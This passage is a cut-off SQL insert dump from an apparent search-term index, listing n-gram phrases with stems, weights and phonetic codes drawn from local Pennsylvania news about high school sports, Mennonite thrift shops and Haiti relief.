lacrosse softball',0,1,1.8,'H242621314',1,'en'),(48705,'hope area','hope area',0,1,1.3,'H160',1,'en'),(48706,'hope area man','hope area man',0,1,1.4333,'H165',1,'en'),(48707,'hospital','hospit',0,0,0.5333,'H2134',1,'en'),(48708,'hospital in','hospit in',0,1,1.3667,'H21345',1,'en'),(48709,'hospital in bethlehem','hospit in bethlehem',0,1,1.7,'H213451345',1,'en'),(48710,'host','host',0,0,0.2667,'H230',1,'en'),(48711,'host of','host of',0,1,1.2333,'H231',1,'en'),(48712,'host of sports','host of sports',0,1,1.4667,'H23121632',1,'en'),(48713,'housenick','housenick',0,0,0.6,'H252',1,'en'),(48714,'housenick march','housenick march',0,1,1.5,'H252562',1,'en'),(48715,'housenick march 22','housenick march 22',0,1,1.6,'H252562',1,'en'),(48716,'i have a','i have a',0,1,1.2667,'I100',1,'en'),(48717,'i make','i make',0,1,1.2,'I520',1,'en'),(48718,'i make sure','i make sure',0,1,1.3667,'I526',1,'en'),(48719,'in a few','in a few',0,1,1.2667,'I510',1,'en'),(48720,'in a two','in a two',0,1,1.2667,'I530',1,'en'),(48721,'in bethlehem','in bethlehem',0,1,1.4,'I51345',1,'en'),(48722,'in bethlehem coroner','in bethlehem coroner',0,1,1.6667,'I513452656',1,'en'),(48723,'in christ','in christ',0,1,1.3,'I52623',1,'en'),(48724,'in christ churches','in christ churches',0,1,1.6,'I52623262',1,'en'),(48725,'in double','in double',0,1,1.3,'I5314',1,'en'),(48726,'in double extra','in double extra',0,1,1.5,'I5314236',1,'en'),(48727,'in excess','in excess',0,1,1.3,'I520',1,'en'),(48728,'in excess of','in excess of',0,1,1.4,'I521',1,'en'),(48729,'in expenses','in expenses',0,1,1.3667,'I52152',1,'en'),(48730,'in expenses to','in expenses to',0,1,1.4667,'I521523',1,'en'),(48731,'in friday\'s','in friday',0,1,1.3667,'I51632',1,'en'),(48732,'in friday\'s preparation','in friday preparation',0,1,1.7667,'I51632161635',1,'en'),(48733,'in haiti','in haiti',0,1,1.2667,'I530',1,'en'),(48734,'in haiti working','in haiti working',0,1,1.5333,'I536252',1,'en'),(48735,'in rallying','in rallying',0,1,1.3667,'I56452',1,'en'),(48736,'in rallying for','in rallying for',0,1,1.5,'I5645216',1,'en'),(48737,'in souderton','in souderton',0,1,1.4,'I523635',1,'en'),(48738,'in souderton past','in souderton past',0,1,1.5667,'I523635123',1,'en'),(48739,'in souderton the','in souderton the',0,1,1.5333,'I5236353',1,'en'),(48740,'in the accident','in the accident',0,1,1.5,'I532353',1,'en'),(48741,'in the second','in the second',0,1,1.4333,'I53253',1,'en'),(48742,'in the western','in the western',0,1,1.4667,'I532365',1,'en'),(48743,'injuries he','injuri he',0,1,1.3667,'I5262',1,'en'),(48744,'injuries he suffered','injuri he suffered',0,1,1.6667,'I5262163',1,'en'),(48745,'injuries in','injuri in',0,1,1.3667,'I52625',1,'en'),(48746,'injuries in the','injuri in the',0,1,1.5,'I526253',1,'en'),(48747,'into his','into his',0,1,1.2667,'I532',1,'en'),(48748,'into his own','into his own',0,1,1.4,'I5325',1,'en'),(48749,'is looking','is looking',0,1,1.3333,'I24252',1,'en'),(48750,'is looking at','is looking at',0,1,1.4333,'I242523',1,'en'),(48751,'is the help','is the help',0,1,1.3667,'I2341',1,'en'),(48752,'isn\'t one','isn one',0,1,1.3,'I2535',1,'en'),(48753,'isn\'t one of','isn one of',0,1,1.4,'I25351',1,'en'),(48754,'it tries','it tries',0,1,1.2667,'I362',1,'en'),(48755,'it tries to','it tries to',0,1,1.3667,'I3623',1,'en'),(48756,'its way within','it way within',0,1,1.4667,'I3235',1,'en'),(48757,'itself a','itself a',0,1,1.2667,'I3241',1,'en'),(48758,'itself a 20','itself a 20',0,1,1.3667,'I3241',1,'en'),(48759,'jan.15','jan.15',0,0,0.4,'J500',1,'en'),(48760,'jan.15 and','jan.15 and',0,1,1.3333,'J530',1,'en'),(48761,'jan.15 and as','jan.15 and as',0,1,1.4333,'J532',1,'en'),(48762,'january','januari',0,0,0.4667,'J560',1,'en'),(48763,'january 7','januari 7',0,1,1.3,'J560',1,'en'),(48764,'january 7 2010','januari 7 2010',0,1,1.4667,'J560',1,'en'),(48765,'junior','junior',0,0,0.4,'J560',1,'en'),(48766,'junior high','junior high',0,1,1.3667,'J562',1,'en'),(48767,'junior high school','junior high school',0,1,1.6,'J5624',1,'en'),(48768,'junior nick','junior nick',0,1,1.3667,'J5652',1,'en'),(48769,'junior nick zambelli','junior nick zambelli',0,1,1.6667,'J5652514',1,'en'),(48770,'junior varsity','junior varsity',0,1,1.4667,'J561623',1,'en'),(48771,'junior varsity teams','junior varsity teams',0,1,1.6667,'J56162352',1,'en'),(48772,'just 12','just 12',0,1,1.2333,'J300',1,'en'),(48773,'just 12 takes','just 12 takes',0,1,1.4333,'J320',1,'en'),(48774,'just pretty','just pretty',0,1,1.3667,'J3163',1,'en'),(48775,'just pretty high','just pretty high',0,1,1.5333,'J31632',1,'en'),(48776,'just wasn\'t','just wasn',0,1,1.3667,'J3253',1,'en'),(48777,'just wasn\'t and','just wasn and',0,1,1.5,'J325353',1,'en'),(48778,'just when','just when',0,1,1.3,'J350',1,'en'),(48779,'just when the','just when the',0,1,1.4333,'J353',1,'en'),(48780,'kohl','kohl',0,0,0.2667,'K400',1,'en'),(48781,'kohl special','kohl special',0,1,1.4,'K42124',1,'en'),(48782,'kohl special to','kohl special to',0,1,1.5,'K421243',1,'en'),(48783,'lacrosse','lacross',0,0,0.5333,'L262',1,'en'),(48784,'lacrosse soccer','lacross soccer',0,1,1.5,'L2626',1,'en'),(48785,'lacrosse soccer and','lacross soccer and',0,1,1.6333,'L262653',1,'en'),(48786,'lacrosse softball','lacross softball',0,1,1.5667,'L2621314',1,'en'),(48787,'lacrosse softball and','lacross softball and',0,1,1.7,'L262131453',1,'en'),(48788,'last friday','last friday',0,1,1.3667,'L23163',1,'en'),(48789,'last friday night','last friday night',0,1,1.5667,'L23163523',1,'en'),(48790,'lead shrink','lead shrink',0,1,1.3667,'L32652',1,'en'),(48791,'lead shrink to','lead shrink to',0,1,1.4667,'L326523',1,'en'),(48792,'lehigh local','lehigh local',0,1,1.4,'L2424',1,'en'),(48793,'lehigh local coroner','lehigh local coroner',0,1,1.6667,'L24242656',1,'en'),(48794,'levels as','level as',0,1,1.3,'L142',1,'en'),(48795,'levels as it','level as it',0,1,1.4,'L1423',1,'en'),(48796,'local coroner','local coroner',0,1,1.4333,'L242656',1,'en'),(48797,'local coroner said','local coroner said',0,1,1.6,'L24265623',1,'en'),(48798,'looked from','look from',0,1,1.3667,'L23165',1,'en'),(48799,'looked from it','look from it',0,1,1.4667,'L231653',1,'en'),(48800,'looking at','look at',0,1,1.3333,'L2523',1,'en'),(48801,'looking at eliminating','look at eliminating',0,1,1.7333,'L252345352',1,'en'),(48802,'ls','ls',0,0,0.1333,'L200',1,'en'),(48803,'ls conference','ls conference',0,1,1.4333,'L251652',1,'en'),(48804,'ls conference title','ls conference title',0,1,1.6333,'L25165234',1,'en'),(48805,'ls conference victory','ls conference victory',0,1,1.7,'L2516521236',1,'en'),(48806,'luke','luke',0,0,0.2667,'L200',1,'en'),(48807,'luke moyer','luke moyer',0,1,1.3333,'L256',1,'en'),(48808,'luke moyer isn\'t','luke moyer isn',0,1,1.5333,'L256253',1,'en'),(48809,'made hospital','made hospital',0,1,1.4333,'M32134',1,'en'),(48810,'made hospital in','made hospital in',0,1,1.5333,'M321345',1,'en'),(48811,'make sure','make sure',0,1,1.3,'M260',1,'en'),(48812,'make sure i','make sure i',0,1,1.3667,'M260',1,'en'),(48813,'man died','man died',0,1,1.2667,'M300',1,'en'),(48814,'man died friday','man died friday',0,1,1.5,'M3163',1,'en'),(48815,'march 22','march 22',0,1,1.2667,'M620',1,'en'),(48816,'march 22 2013','march 22 2013',0,1,1.4333,'M620',1,'en'),(48817,'matching','match',0,0,0.5333,'M3252',1,'en'),(48818,'matching gift','match gift',0,1,1.4333,'M325213',1,'en'),(48819,'matching gift of','match gift of',0,1,1.5333,'M3252131',1,'en'),(48820,'may 11','mai 11',0,1,1.2,'M000',1,'en'),(48821,'may 11 where','mai 11 where',0,1,1.4,'M600',1,'en'),(48822,'mcc','mcc',0,0,0.2,'M200',1,'en'),(48823,'mcc has','mcc has',0,1,1.2333,'M200',1,'en'),(48824,'mcc has been','mcc has been',0,1,1.4,'M215',1,'en'),(48825,'mcc is','mcc is',0,1,1.2,'M200',1,'en'),(48826,'mcc is the','mcc is the',0,1,1.3333,'M230',1,'en'),(48827,'melinda','melinda',0,0,0.4667,'M453',1,'en'),(48828,'melinda rizzo','melinda rizzo',0,1,1.4333,'M45362',1,'en'),(48829,'melinda rizzo big','melinda rizzo big',0,1,1.5667,'M4536212',1,'en'),(48830,'mennonite','mennonit',0,0,0.6,'M300',1,'en'),(48831,'mennonite and','mennonit and',0,1,1.4333,'M353',1,'en'),(48832,'mennonite and brethren','mennonit and brethren',0,1,1.7333,'M35316365',1,'en'),(48833,'mennonite central','mennonit central',0,1,1.5667,'M325364',1,'en'),(48834,'mennonite central committee\'s','mennonit central committee',0,1,1.9667,'M3253642532',1,'en'),(48835,'met','met',0,0,0.2,'M300',1,'en'),(48836,'met by','met by',0,1,1.2,'M310',1,'en'),(48837,'met by customers','met by customers',0,1,1.5333,'M3123562',1,'en'),(48838,'middle','middl',0,0,0.4,'M340',2,'en'),(48839,'middle and','middl and',0,1,1.3333,'M3453',1,'en'),(48840,'middle and high','middl and high',0,1,1.5,'M34532',1,'en'),(48841,'million in expenses','million in expenses',0,1,1.6333,'M452152',1,'en'),(48842,'months ago','month ago',0,1,1.3333,'M320',1,'en'),(48843,'months ago in','month ago in',0,1,1.4333,'M325',1,'en'),(48844,'morgans','morgan',0,0,0.4667,'M6252',1,'en'),(48845,'morgans said','morgan said',0,1,1.4,'M62523',1,'en'),(48846,'morgans said during','morgan said during',0,1,1.6333,'M62523652',1,'en'),(48847,'morning cal','morn cal',0,1,1.3667,'M6524',1,'en'),(48848,'morning cal may','morn cal may',0,1,1.5,'M65245',1,'en'),(48849,'morning call','morn call',0,1,1.4,'M6524',1,'en'),(48850,'morning call demonstrate','morn call demonstrate',0,1,1.8,'M6524352363',1,'en'),(48851,'moyer','moyer',0,0,0.3333,'M600',1,'en'),(48852,'moyer isn\'t','moyer isn',0,1,1.3667,'M6253',1,'en'),(48853,'moyer isn\'t one','moyer isn one',0,1,1.5,'M62535',1,'en'),(48854,'moyer took','moyer took',0,1,1.3333,'M632',1,'en'),(48855,'moyer took be','moyer took be',0,1,1.4333,'M6321',1,'en'),(48856,'multiple blunt','multipl blunt',0,1,1.4667,'M43141453',1,'en'),(48857,'multiple blunt force','multipl blunt force',0,1,1.6667,'M43141453162',1,'en'),(48858,'new hope','new hope',0,1,1.2667,'N100',1,'en'),(48859,'new hope area','new hope area',0,1,1.4333,'N160',1,'en'),(48860,'nick','nick',0,0,0.2667,'N200',1,'en'),(48861,'nick soriano\'s','nick soriano',0,1,1.4667,'N2652',1,'en'),(48862,'nick soriano\'s 20','nick soriano 20',0,1,1.5667,'N2652',1,'en'),(48863,'nick zambelli','nick zambelli',0,1,1.4333,'N2514',1,'en'),(48864,'nick zambelli and','nick zambelli and',0,1,1.5667,'N251453',1,'en'),(48865,'night just','night just',0,1,1.3333,'N2323',1,'en'),(48866,'night just when','night just when',0,1,1.5,'N23235',1,'en'),(48867,'nolan','nolan',0,0,0.3333,'N450',1,'en'),(48868,'nolan ridgway','nolan ridgway',0,1,1.4333,'N45632',1,'en'),(48869,'nolan ridgway all','nolan ridgway all',0,1,1.5667,'N456324',1,'en'),(48870,'not for the','not for the',0,1,1.3667,'N3163',1,'en'),(48871,'not publicly','not publicly',0,1,1.4,'N31424',1,'en'),(48872,'not publicly reveal','not publicly reveal',0,1,1.6333,'N31424614',1,'en'),(48873,'of 10 000','of 10 000',0,1,1.3,'O100',1,'en'),(48874,'of 20','of 20',0,1,1.1667,'O100',1,'en'),(48875,'of 20 001.02','of 20 001.02',0,1,1.4,'O100',1,'en'),(48876,'of injuries','of injuries',0,1,1.3667,'O15262',1,'en'),(48877,'of injuries he','of injuries he',0,1,1.4667,'O15262',1,'en'),(48878,'of ramifications','of ramifications',0,1,1.5333,'O16512352',1,'en'),(48879,'of ramifications from','of ramifications from',0,1,1.7,'O16512352165',1,'en'),(48880,'of sports','of sports',0,1,1.3,'O121632',1,'en'),(48881,'of sports teams','of sports teams',0,1,1.5,'O121632352',1,'en'),(48882,'of the blue','of the blue',0,1,1.3667,'O1314',1,'en'),(48883,'of the goal','of the goal',0,1,1.3667,'O1324',1,'en'),(48884,'of the mennonite','of the mennonite',0,1,1.5333,'O1353',1,'en'),(48885,'of the preseason','of the preseason',0,1,1.5333,'O131625',1,'en'),(48886,'of which','of which',0,1,1.2667,'O120',1,'en'),(48887,'of which after','of which after',0,1,1.4667,'O12136',1,'en'),(48888,'off four','off four',0,1,1.2667,'O160',1,'en'),(48889,'off four touchdowns','off four touchdowns',0,1,1.6333,'O1632352',1,'en'),(48890,'old new','old new',0,1,1.2333,'O435',1,'en'),(48891,'old new hope','old new hope',0,1,1.4,'O4351',1,'en'),(48892,'on dicing','on dicing',0,1,1.3,'O53252',1,'en'),(48893,'on dicing block','on dicing block',0,1,1.5,'O53252142',1,'en'),(48894,'on from scrimmage','on from scrimmage',0,1,1.5667,'O51652652',1,'en'),(48895,'one ls','on ls',0,1,1.2,'O542',1,'en'),(48896,'one ls conference','on ls conference',0,1,1.5667,'O54251652',1,'en'),(48897,'one of which','on of which',0,1,1.4,'O512',1,'en'),(48898,'or even smy','or even smy',0,1,1.3667,'O61525',1,'en'),(48899,'over 50','over 50',0,1,1.2333,'O160',1,'en'),(48900,'over 50 years','over 50 years',0,1,1.4333,'O162',1,'en'),(48901,'over the big','over the big',0,1,1.4,'O16312',1,'en'),(48902,'overall total','overal total',0,1,1.4333,'O16434',1,'en'),(48903,'overall total of','overal total of',0,1,1.5333,'O164341',1,'en'),(48904,'overtime','overtim',0,0,0.5333,'O1635',1,'en'),(48905,'overtime quakertown','overtim quakertown',0,1,1.6333,'O16352635',1,'en'),(48906,'overtime quakertown finally','overtim quakertown finally',0,1,1.9,'O16352635154',1,'en'),(48907,'own hands','own hands',0,1,1.3,'O532',1,'en'),(48908,'own hands the','own hands the',0,1,1.4333,'O5323',1,'en'),(48909,'pandora bracelets 2011','pandora bracelets 2011',0,1,1.7333,'P536162432',1,'en'),(48910,'panther','panther',0,0,0.4667,'P536',1,'en'),(48911,'panther defense','panther defense',0,1,1.5,'P5363152',1,'en'),(48912,'panther defense held','panther defense held',0,1,1.6667,'P536315243',1,'en'),(48913,'panthers','panther',0,0,0.5333,'P5362',1,'en'),(48914,'panthers aren\'t','panther aren',0,1,1.5,'P5362653',1,'en'),(48915,'panthers aren\'t going','panther aren going',0,1,1.7,'P5362653252',1,'en'),(48916,'panthers looked','panther looked',0,1,1.5,'P5362423',1,'en'),(48917,'panthers looked from','panther looked from',0,1,1.6667,'P5362423165',1,'en'),(48918,'past melinda','past melinda',0,1,1.4,'P235453',1,'en'),(48919,'past melinda rizzo','past melinda rizzo',0,1,1.6,'P23545362',1,'en'),(48920,'peace agency','peac agency',0,1,1.4,'P252',1,'en'),(48921,'peace agency of','peac agency of',0,1,1.5,'P2521',1,'en'),(48922,'people in','peopl in',0,1,1.3,'P450',1,'en'),(48923,'people in the','peopl in the',0,1,1.4333,'P453',1,'en'),(48924,'point fourth','point fourth',0,1,1.4,'P53163',1,'en'),(48925,'point fourth quarter','point fourth quarter',0,1,1.6667,'P531632636',1,'en'),(48926,'points of','point of',0,1,1.3,'P5321',1,'en'),(48927,'points of the','point of the',0,1,1.4333,'P53213',1,'en'),(48928,'poorest','poorest',0,0,0.4667,'P623',1,'en'),(48929,'poorest people','poorest people',0,1,1.4667,'P62314',1,'en'),(48930,'poorest people in','poorest people in',0,1,1.5667,'P623145',1,'en'),(48931,'preparation junior','prepar junior',0,1,1.6,'P61635256',1,'en'),(48932,'preparation junior nick','prepar junior nick',0,1,1.7667,'P6163525652',1,'en'),(48933,'preseason','preseason',0,0,0.6,'P625',1,'en'),(48934,'preseason an','preseason an',0,1,1.4,'P625',1,'en'),(48935,'preseason an 89','preseason an 89',0,1,1.5,'P625',1,'en'),(48936,'pretty high','pretti high',0,1,1.3667,'P632',1,'en'),(48937,'pretty high school','pretti high school',0,1,1.6,'P6324',1,'en'),(48938,'production and','product and',0,1,1.4667,'P632353',1,'en'),(48939,'production and peace','product and peace',0,1,1.6667,'P63235312',1,'en'),(48940,'publicly','publicli',0,0,0.5333,'P424',1,'en'),(48941,'publicly reveal','publicli reveal',0,1,1.5,'P424614',1,'en'),(48942,'publicly reveal the','publicli reveal the',0,1,1.6333,'P4246143',1,'en'),(48943,'quakertown','quakertown',0,0,0.6667,'Q635',1,'en'),(48944,'quakertown finally','quakertown finally',0,1,1.6,'Q635154',1,'en'),(48945,'quakertown finally had','quakertown finally had',0,1,1.7333,'Q6351543',1,'en'),(48946,'quakertown high\'s','quakertown high',0,1,1.5667,'Q6352',1,'en'),(48947,'quakertown high\'s football','quakertown high football',0,1,1.8667,'Q63521314',1,'en'),(48948,'quarter','quarter',0,0,0.4667,'Q636',2,'en'),(48949,'quarter lead','quarter lead',0,1,1.4,'Q63643',1,'en'),(48950,'quarter lead shrink','quarter lead shrink',0,1,1.6333,'Q636432652',1,'en'),(48951,'rallying','ralli',0,0,0.5333,'R452',1,'en'),(48952,'rallying for','ralli for',0,1,1.4,'R45216',1,'en'),(48953,'rallying for a','ralli for a',0,1,1.4667,'R45216',1,'en'),(48954,'ramifications','ramif',0,0,0.8667,'R512352',1,'en'),(48955,'ramifications from','ramif from',0,1,1.6,'R512352165',1,'en'),(48956,'ramifications from multiple','ramif from multiple',0,1,1.9,'R5123521654314',1,'en'),(48957,'rams','ram',0,0,0.2667,'R520',1,'en'),(48958,'rams ran','ram ran',0,1,1.2667,'R5265',1,'en'),(48959,'rams ran just','ram ran just',0,1,1.4333,'R526523',1,'en'),(48960,'ran','ran',0,0,0.2,'R500',1,'en'),(48961,'ran just','ran just',0,1,1.2667,'R523',1,'en'),(48962,'ran just 12','ran just 12',0,1,1.3667,'R523',1,'en'),(48963,'rattled','rattl',0,0,0.4667,'R343',1,'en'),(48964,'rattled off','rattl off',0,1,1.3667,'R3431',1,'en'),(48965,'rattled off four','rattl off four',0,1,1.5333,'R34316',1,'en'),(48966,'recreational','recreat',0,0,0.8,'R26354',1,'en'),(48967,'recreational softball','recreat softball',0,1,1.7,'R2635421314',1,'en'),(48968,'recreational softball would','recreat softball would',0,1,1.9,'R26354213143',1,'en'),(48969,'reliable','reliabl',0,0,0.5333,'R414',1,'en'),(48970,'reliable source','reliabl source',0,1,1.5,'R414262',1,'en'),(48971,'reliable source in','reliabl source in',0,1,1.6,'R4142625',1,'en'),(48972,'relief','relief',0,0,0.4,'R410',1,'en'),(48973,'relief effort','relief effort',0,1,1.4333,'R4163',1,'en'),(48974,'relief effort mcc','relief effort mcc',0,1,1.5667,'R416352',1,'en'),(48975,'remaining sports','remain sports',0,1,1.5333,'R521632',1,'en'),(48976,'remaining sports superbly','remain sports superbly',0,1,1.8333,'R5216321614',1,'en'),(48977,'reps during','rep during',0,1,1.3667,'R123652',1,'en'),(48978,'reps during different','rep during different',0,1,1.7,'R12365231653',1,'en'),(48979,'result 22.an','result 22.an',0,1,1.4,'R2435',1,'en'),(48980,'result 22.an overall','result 22.an overall',0,1,1.6667,'R2435164',1,'en'),(48981,'reveal','reveal',0,0,0.4,'R140',1,'en'),(48982,'reveal the','reveal the',0,1,1.3333,'R143',1,'en'),(48983,'reveal the starter','reveal the starter',0,1,1.6,'R14323636',1,'en'),(48984,'ridgway','ridgwai',0,0,0.4667,'R320',1,'en'),(48985,'ridgway all','ridgwai all',0,1,1.3667,'R324',1,'en'),(48986,'ridgway all earned','ridgwai all earned',0,1,1.6,'R324653',1,'en'),(48987,'rizzo','rizzo',0,0,0.3333,'R200',1,'en'),(48988,'rizzo big','rizzo big',0,1,1.3,'R212',1,'en'),(48989,'rizzo big to','rizzo big to',0,1,1.4,'R2123',1,'en'),(48990,'ron kohl','ron kohl',0,1,1.2667,'R524',1,'en'),(48991,'ron kohl special','ron kohl special',0,1,1.5333,'R5242124',1,'en'),(48992,'said at','said at',0,1,1.2333,'S300',1,'en'),(48993,'said at good','said at good',0,1,1.4,'S323',1,'en'),(48994,'said during','said during',0,1,1.3667,'S3652',1,'en'),(48995,'said during a','said during a',0,1,1.4333,'S3652',1,'en'),(48996,'said he died','said he died',0,1,1.4,'S300',1,'en'),(48997,'school district','school district',0,1,1.5,'S4323623',1,'en'),(48998,'school district is','school district is',0,1,1.6,'S43236232',1,'en'),(48999,'school graduation','school graduation',0,1,1.5667,'S42635',1,'en'),(49000,'school graduation levels','school graduation levels',0,1,1.8,'S426354142',1,'en'),(49001,'school graduation winter','school graduation winter',0,1,1.8,'S4263536',1,'en'),(49002,'school junior','school junior',0,1,1.4333,'S4256',1,'en'),(49003,'school junior varsity','school junior varsity',0,1,1.7,'S42561623',1,'en'),(49004,'scoreless','scoreless',0,0,0.6,'S642',1,'en'),(49005,'scoreless in','scoreless in',0,1,1.4,'S6425',1,'en'),(49006,'scoreless in the','scoreless in the',0,1,1.5333,'S64253',1,'en'),(49007,'scott','scott',0,0,0.3333,'S300',1,'en'),(49008,'scott grim','scott grim',0,1,1.3333,'S3265',1,'en'),(49009,'scott grim said','scott grim said',0,1,1.5,'S326523',1,'en'),(49010,'scrimmage','scrimmag',0,0,0.6,'S652',1,'en'),(49011,'scrimmage but','scrimmag but',0,1,1.4333,'S65213',1,'en'),(49012,'scrimmage but rattled','scrimmag but rattled',0,1,1.7,'S652136343',1,'en'),(49013,'second overtime','second overtime',0,1,1.5,'S531635',1,'en'),(49014,'second overtime quakertown','second overtime quakertown',0,1,1.8667,'S5316352635',1,'en'),(49015,'share thrift','share thrift',0,1,1.4,'S63613',1,'en'),(49016,'share thrift shoppes','share thrift shoppes',0,1,1.6667,'S63613212',1,'en'),(49017,'shave','shave',0,0,0.3333,'S100',1,'en'),(49018,'shave almost','shave almost',0,1,1.4,'S14523',1,'en'),(49019,'shave almost 3','shave almost 3',0,1,1.4667,'S14523',1,'en'),(49020,'shepherd','shepherd',0,0,0.5333,'S163',1,'en'),(49021,'shepherd custom','shepherd custom',0,1,1.5,'S163235',1,'en'),(49022,'shepherd custom made','shepherd custom made',0,1,1.6667,'S1632353',1,'en'),(49023,'shop subscribers','shop subscribers',0,1,1.5333,'S12126162',1,'en'),(49024,'shop subscribers help','shop subscribers help',0,1,1.7,'S1212616241',1,'en'),(49025,'shoppes','shopp',0,0,0.4667,'S120',1,'en'),(49026,'shoppes matching','shopp matching',0,1,1.5333,'S1253252',1,'en'),(49027,'shoppes matching gift','shopp matching gift',0,1,1.7,'S125325213',1,'en'),(49028,'shrink','shrink',0,0,0.4,'S652',1,'en'),(49029,'shrink to','shrink to',0,1,1.3,'S6523',1,'en'),(49030,'shrink to 63','shrink to 63',0,1,1.4,'S6523',1,'en'),(49031,'significant','signific',0,0,0.7333,'S51253',1,'en'),(49032,'significant into','signific into',0,1,1.5333,'S5125353',1,'en'),(49033,'significant into his','signific into his',0,1,1.6667,'S51253532',1,'en'),(49034,'smy','smy',0,0,0.2,'S500',1,'en'),(49035,'smy friend','smy friend',0,1,1.3333,'S51653',1,'en'),(49036,'smy friend even','smy friend even',0,1,1.5,'S5165315',1,'en'),(49037,'so will','so will',0,1,1.2333,'S400',1,'en'),(49038,'so will not','so will not',0,1,1.3667,'S453',1,'en'),(49039,'soccer and','soccer and',0,1,1.3333,'S653',1,'en'),(49040,'soccer and competitive','soccer and competitive',0,1,1.7333,'S65325131',1,'en'),(49041,'soccer baseball','soccer baseball',0,1,1.5,'S61214',1,'en'),(49042,'soccer baseball football','soccer baseball football',0,1,1.8,'S612141314',1,'en'),(49043,'softball','softbal',0,0,0.5333,'S1314',1,'en'),(49044,'softball and','softbal and',0,1,1.4,'S131453',1,'en'),(49045,'softball and tennis','softbal and tennis',0,1,1.6333,'S13145352',1,'en'),(49046,'softball would','softbal would',0,1,1.4667,'S13143',1,'en'),(49047,'softball would go','softbal would go',0,1,1.5667,'S131432',1,'en'),(49048,'sophomores','sophomor',0,0,0.6667,'S1562',1,'en'),(49049,'sophomores devante','sophomor devante',0,1,1.6,'S15623153',1,'en'),(49050,'sophomores devante cross','sophomor devante cross',0,1,1.8,'S15623153262',1,'en'),(49051,'soriano\'s','soriano',0,0,0.6,'S652',1,'en'),(49052,'soriano\'s 20','soriano 20',0,1,1.4,'S652',1,'en'),(49053,'soriano\'s 20 yard','soriano 20 yard',0,1,1.5667,'S65263',1,'en'),(49054,'souderton','souderton',0,0,0.6,'S3635',1,'en'),(49055,'souderton area','souderton area',0,1,1.4667,'S36356',1,'en'),(49056,'souderton area school','souderton area school',0,1,1.7,'S3635624',1,'en'),(49057,'souderton articles','souderton articles',0,1,1.6,'S363563242',1,'en'),(49058,'souderton articles about','souderton articles about',0,1,1.8,'S36356324213',1,'en'),(49059,'souderton in','souderton in',0,1,1.4,'S3635',1,'en'),(49060,'souderton in double','souderton in double',0,1,1.6333,'S3635314',1,'en'),(49061,'souderton past','souderton past',0,1,1.4667,'S3635123',1,'en'),(49062,'souderton past melinda','souderton past melinda',0,1,1.7333,'S36351235453',1,'en'),(49063,'souderton scoreless','souderton scoreless',0,1,1.6333,'S36352642',1,'en'),(49064,'souderton scoreless in','souderton scoreless in',0,1,1.7333,'S363526425',1,'en'),(49065,'souderton sporting','souderton sporting',0,1,1.6,'S3635216352',1,'en'),(49066,'souderton sporting goods','souderton sporting goods',0,1,1.8,'S363521635232',1,'en'),(49067,'souderton the','souderton the',0,1,1.4333,'S36353',1,'en'),(49068,'souderton the lehigh','souderton the lehigh',0,1,1.6667,'S3635342',1,'en'),(49069,'souderton thrift','souderton thrift',0,1,1.5333,'S36353613',1,'en'),(49070,'souderton thrift shop','souderton thrift shop',0,1,1.7,'S3635361321',1,'en'),(49071,'source in','sourc in',0,1,1.3,'S625',1,'en'),(49072,'source in haiti','sourc in haiti',0,1,1.5,'S6253',1,'en'),(49073,'special to','special to',0,1,1.3333,'S1243',1,'en'),(49074,'special to the','special to the',0,1,1.4667,'S1243',1,'en'),(49075,'sporting','sport',0,0,0.5333,'S16352',1,'en'),(49076,'sporting goods','sport goods',0,1,1.4667,'S1635232',1,'en'),(49077,'sporting goods staff','sport goods staff',0,1,1.6667,'S163523231',1,'en'),(49078,'sports','sport',0,0,0.4,'S1632',1,'en'),(49079,'sports superbly','sport superbly',0,1,1.5,'S16321614',1,'en'),(49080,'sports superbly written','sport superbly written',0,1,1.7667,'S16321614635',1,'en'),(49081,'sports teams','sport teams',0,1,1.4,'S1632352',1,'en'),(49082,'sports teams at','sport teams at',0,1,1.5,'S16323523',1,'en'),(49083,'staff on','staff on',0,1,1.2667,'S315',1,'en'),(49084,'staff on dicing','staff on dicing',0,1,1.5,'S3153252',1,'en'),(49085,'starter','starter',0,0,0.4667,'S3636',1,'en'),(49086,'starter until','starter until',0,1,1.4333,'S3636534',1,'en'),(49087,'starter until in','starter until in',0,1,1.5333,'S36365345',1,'en'),(49088,'submitted to mennonite','submit to mennonite',0,1,1.7333,'S15353',1,'en'),(49089,'subscribers','subscrib',0,0,0.7333,'S126162',1,'en'),(49090,'subscribers help','subscrib help',0,1,1.5333,'S12616241',1,'en'),(49091,'subscribers help haiti','subscrib help haiti',0,1,1.7333,'S126162413',1,'en'),(49092,'suburban','suburban',0,0,0.5333,'S1615',1,'en'),(49093,'suburban one','suburban one',0,1,1.4,'S1615',1,'en'),(49094,'suburban one ls','suburban one ls',0,1,1.5,'S161542',1,'en'),(49095,'suffered','suffer',0,0,0.5333,'S163',1,'en'),(49096,'suffered in','suffer in',0,1,1.3667,'S1635',1,'en'),(49097,'suffered in a','suffer in a',0,1,1.4333,'S1635',1,'en'),(49098,'superbly','superbl',0,0,0.5333,'S1614',1,'en'),(49099,'superbly written','superbl written',0,1,1.5333,'S1614635',1,'en'),(49100,'superbly written expertly','superbl written expertly',0,1,1.8333,'S161463521634',1,'en'),(49101,'sure i','sure i',0,1,1.2,'S600',1,'en'),(49102,'sure i have','sure i have',0,1,1.3667,'S610',1,'en'),(49103,'takes on','take on',0,1,1.2667,'T250',1,'en'),(49104,'takes on from','take on from',0,1,1.4333,'T25165',1,'en'),(49105,'talk to','talk to',0,1,1.2333,'T423',1,'en'),(49106,'talk to those','talk to those',0,1,1.4333,'T4232',1,'en'),(49107,'team beat','team beat',0,1,1.3,'T513',1,'en'),(49108,'team beat souderton','team beat souderton',0,1,1.6333,'T51323635',1,'en'),(49109,'team reps during','team reps during',0,1,1.5333,'T56123652',1,'en'),(49110,'teams','team',0,0,0.3333,'T520',1,'en'),(49111,'teams adding','team adding',0,1,1.4,'T52352',1,'en'),(49112,'teams adding cheap','team adding cheap',0,1,1.6,'T523521',1,'en'),(49113,'teams at','team at',0,1,1.2667,'T523',1,'en'),(49114,'teams at the','team at the',0,1,1.4,'T523',1,'en'),(49115,'teams for','team for',0,1,1.3,'T5216',1,'en'),(49116,'teams for football','team for football',0,1,1.6,'T52161314',1,'en'),(49117,'tennis and','tenni and',0,1,1.3333,'T5253',1,'en'),(49118,'tennis and boys','tenni and boys',0,1,1.5,'T525312',1,'en'),(49119,'the accident','the accident',0,1,1.4,'T2353',1,'en'),(49120,'the accident but','the accident but',0,1,1.5333,'T235313',1,'en'),(49121,'the big red','the big red',0,1,1.3667,'T1263',1,'en'),(49122,'the blue','the blue',0,1,1.2667,'T140',1,'en'),(49123,'the blue they','the blue 